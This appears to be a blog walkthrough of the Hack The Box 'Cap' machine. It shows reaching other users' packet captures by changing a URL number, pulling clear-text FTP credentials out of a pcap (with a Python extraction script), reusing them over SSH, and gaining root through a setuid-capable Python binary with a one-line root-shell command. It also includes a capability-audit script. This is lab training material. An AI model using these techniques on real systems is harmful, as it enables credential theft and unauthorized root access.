Pwn Cap by Hack The Box Walkthrough / Writeup!

Security_Nerd07
3 min read · Aug 18, 2021



Hello friends! Today we are going to take a look at a very easy CTF challenge from Hack The Box

called "Cap". The credit for this machine goes to infosecjack.

It's a Linux-based system,

so without further ado, let's hack!! :)

First things first: after joining the machine, do a quick ping to check whether your system can actually reach the target before you start scanning.

#Step 1 (Recon the available ports & services running on the target machine)

[Image: nmap scan results for the Cap machine]

As we can see from the nmap results, port 80 is open and serves a web page; SSH on port 22 is open as well, which we will come back to later.

#Step 2 (Now let's get acquainted with the site.)

[Image: the Cap web application]

After browsing the website we can conclude that there is some useful information on the "Security Snapshot" page.

After the page loads, locate and choose the snapshot with the most packets in the capture. Note that the snapshot is selected by a plain number in the URL path, so other snapshots are reachable simply by changing that number.
I chose the 'data/0' entry, then downloaded the .pcap file from that page.
Use the command wireshark 0.pcap to open the file from the terminal. FTP authenticates in clear text, so the USER and PASS commands appear directly in the TCP stream.

#Step 3 ( Examine the file & find the FTP details )

And voilà! We found the username and password for the user in the FTP login exchange.
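As an added example (not from the original post), here is how the same extraction can be done without Wireshark: a stdlib-only Python script that walks a classic pcap file, picks out IPv4/TCP segments sent to port 21 and pairs each USER command with the PASS that follows it on the same client connection. The embedded capture, IP addresses and credentials are constructed for the example; they are not the contents of the real 0.pcap. Pass the path to a capture as the first argument to analyse a real file.

```python
import struct

# Addresses and credentials below are constructed for this example; they are not
# the contents of the real 0.pcap from the box.
CLIENT = bytes([10, 0, 0, 5])
SERVER = bytes([10, 0, 0, 9])


def _tcp_frame(src: bytes, dst: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    """Build an Ethernet/IPv4/TCP frame carrying payload (checksums left zero; we never verify them)."""
    eth = b"\x00" * 12 + b"\x08\x00"                          # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1,       # ports, seq, ack
                      5 << 4, 0x18, 65535, 0, 0) + payload    # data offset 5 words, PSH|ACK
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, src, dst)
    return eth + ip + tcp


def build_sample_pcap() -> bytes:
    """A minimal classic pcap (link type 1, Ethernet) holding one clear-text FTP login."""
    frames = [
        _tcp_frame(SERVER, CLIENT, 21, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
        _tcp_frame(CLIENT, SERVER, 54321, 21, b"USER nathan\r\n"),
        _tcp_frame(SERVER, CLIENT, 21, 54321, b"331 Please specify the password.\r\n"),
        _tcp_frame(CLIENT, SERVER, 54321, 21, b"PASS example-password-123\r\n"),
        _tcp_frame(SERVER, CLIENT, 21, 54321, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # pcap global header
    for i, frame in enumerate(frames):
        # per-packet header: ts_sec, ts_usec, captured length, original length
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_frames(pcap: bytes):
    """Yield link-layer frames from a classic pcap buffer (pcapng is not handled here)."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (magic 0x%08x)" % magic)
    (linktype,) = struct.unpack(endian + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("unsupported link type %d, expected Ethernet" % linktype)
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def tcp_segment(frame: bytes):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # IP protocol 6 = TCP
        return None
    (total_len,) = struct.unpack("!H", ip[2:4])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    return src, dst, sport, dport, tcp[data_off:]


def extract_ftp_logins(pcap: bytes) -> list:
    """Pair each USER command with the PASS that follows on the same client connection."""
    pending = {}  # (client ip, client port, server ip) -> username awaiting its password
    logins = []
    for frame in iter_frames(pcap):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        src, dst, sport, dport, data = seg
        if dport != 21 or not data:
            continue  # only client -> server control-channel traffic carries USER/PASS
        for line in data.decode("ascii", errors="replace").splitlines():
            cmd, _, arg = line.partition(" ")
            key = (src, sport, dst)
            if cmd.upper() == "USER":
                pending[key] = arg
            elif cmd.upper() == "PASS" and key in pending:
                logins.append({"client": src, "server": dst,
                               "user": pending.pop(key), "password": arg})
    return logins


if __name__ == "__main__":
    import sys
    # Usage: python3 ftpcreds.py 0.pcap   (no argument: analyse the built-in sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for login in extract_ftp_logins(data):
        print(f"{login['client']} -> {login['server']}: {login['user']} / {login['password']}")
```

Pairing USER with PASS by connection rather than by file order matters on a busy capture with several FTP sessions interleaved; the script also refuses pcapng files and non-Ethernet link types instead of silently misparsing them.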

#Step 4 ( SSH & stuff! )

From our recon stage we can see the nmap result shows that port 22 is open, so let's try to SSH into the server with the credentials recovered from the capture (the FTP password is reused for SSH).

Using the command: " ssh nathan@ip "

Once successfully logged in, do ls, cat the user flag and submit it to Hack The Box.

#Step 5 ( Privilege Escalation )

If a binary has the Linux CAP_SETUID capability set, or it is executed by another binary that has the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. Here the Python interpreter carries that capability, so it can switch its own UID to 0 and spawn a root shell.

For more, check out this page: https://gtfobins.github.io/gtfobins/python/#sudo (the relevant entry is the Capabilities section of that page, not the sudo one).

From the given resource we are using the following one-liner:

python -c 'import os; os.setuid(0); os.system("/bin/sh")'
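To see why that one-liner works, and to recognise the same situation on any other box, the following Python script (an added example, not from the original post or from GTFOBins) parses the output of getcap -r / 2>/dev/null in both the older "path = caps+flags" and newer "path caps=flags" formats, reports capabilities that amount to root when they sit on an interpreter, and decodes the CapEff bitmask from /proc/<pid>/status so you can confirm the running interpreter really holds CAP_SETUID before calling os.setuid(0). The getcap listing and status excerpt are constructed for the example; the capability names and bit numbers are from capabilities(7).

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output; not the real machine's listing.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/perl5.30 = cap_setuid+i
"""

# Constructed /proc/<pid>/status excerpt for a process started from the python binary
# above: CapEff 0x80 is bit 7 = CAP_SETUID (numbering from <linux/capability.h>).
SAMPLE_STATUS = """\
Name:\tpython3
Uid:\t1001\t1001\t1001\t1001
CapInh:\t0000000000000000
CapPrm:\t0000000000000080
CapEff:\t0000000000000080
"""

CAP_SETUID = 7  # capability bit index from <linux/capability.h>

# File capabilities that amount to root when the binary will run code we control.
DANGEROUS = {
    "cap_setuid": "setuid(0) succeeds -> root shell",
    "cap_setgid": "setgid(0) succeeds -> root group",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "reads any file, e.g. /etc/shadow",
    "cap_sys_admin": "mount and namespace abuse",
    "cap_sys_ptrace": "attach to root-owned processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
}

# Binaries that execute code supplied at run time, so a capability on them is immediately usable.
INTERPRETERS = ("python", "perl", "ruby", "php", "node", "gdb", "vim", "bash", "sh")

# Matches "/path = cap_a,cap_b+ep" (older libcap) and "/path cap_a,cap_b=ep" (libcap >= 2.41).
_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>cap_[\w,]+)(?P<flags>[+=][eip]+)$")


def parse_getcap(output: str) -> list:
    """Return one dict per getcap line: path, list of capability names, set of flag letters."""
    entries = []
    for line in output.splitlines():
        m = _LINE.match(line.strip())
        if m:
            entries.append({"path": m.group("path"),
                            "caps": m.group("caps").split(","),
                            "flags": set(m.group("flags")[1:])})
    return entries


def find_privesc_candidates(output: str) -> list:
    """Report dangerous capabilities that are effective or permitted; inheritable-only is skipped."""
    findings = []
    for entry in parse_getcap(output):
        if not entry["flags"] & {"e", "p"}:
            continue  # "+i" alone never enters the effective set on exec, so setuid(0) would fail
        name = entry["path"].rsplit("/", 1)[-1]
        for cap in entry["caps"]:
            if cap in DANGEROUS:
                findings.append({"path": entry["path"], "cap": cap, "why": DANGEROUS[cap],
                                 "interpreter": name.startswith(INTERPRETERS),
                                 "fix": f"setcap -r {entry['path']}"})
    return findings


def effective_caps(status_text: str) -> int:
    """Decode the CapEff bitmask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line in status text")


def has_cap(status_text: str, bit: int) -> bool:
    """True if capability number `bit` is in the process's effective set."""
    return bool(effective_caps(status_text) >> bit & 1)


if __name__ == "__main__":
    import sys
    # Usage: getcap -r / 2>/dev/null > caps.txt; python3 capcheck.py caps.txt
    output = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GETCAP
    for f in find_privesc_candidates(output):
        kind = "interpreter" if f["interpreter"] else "binary"
        print(f"{f['path']} ({kind}): {f['cap']} - {f['why']}; fix: {f['fix']}")
    try:
        status = open("/proc/self/status").read()
    except OSError:
        status = SAMPLE_STATUS
    print("this process has CAP_SETUID in its effective set:", has_cap(status, CAP_SETUID))
```

The check on +e/+p is the practical part: a binary tagged cap_setuid+i only passes the capability on to children that are themselves allowed to inherit it, so the GTFOBins one-liner fails with EPERM there. On a machine you own, the fix is setcap -r on the interpreter (or, better, never granting file capabilities to a general-purpose interpreter at all).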

And voilà! We have our root flag as well. Congratulations!! :)

Now submit the flag to get your own Cap pwned badge from Hack The Box.
